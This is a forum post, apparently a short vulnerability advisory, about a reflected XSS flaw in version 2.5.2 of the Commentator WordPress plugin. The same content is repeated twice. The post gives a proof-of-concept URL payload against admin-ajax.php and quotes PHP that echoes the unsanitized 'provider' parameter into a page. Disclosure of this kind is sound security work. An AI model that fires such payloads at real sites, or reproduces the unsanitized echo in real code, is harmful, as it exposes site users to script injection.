01-14-2016, 01:44 PM
All the Commentator WordPress Plugin listen carefully
Version: 2.5.2
Security all ready fix on new version 2.5.3
Please all the member update to new version
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>
----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
[img]
http://s24.postimg.org/gmcl5ibqt/commentatorxsspoc.png[/img]
Version: 2.5.2
Security all ready fix on new version 2.5.3
Please all the member update to new version
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>
----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
[img]
http://s24.postimg.org/gmcl5ibqt/commentatorxsspoc.png[/img]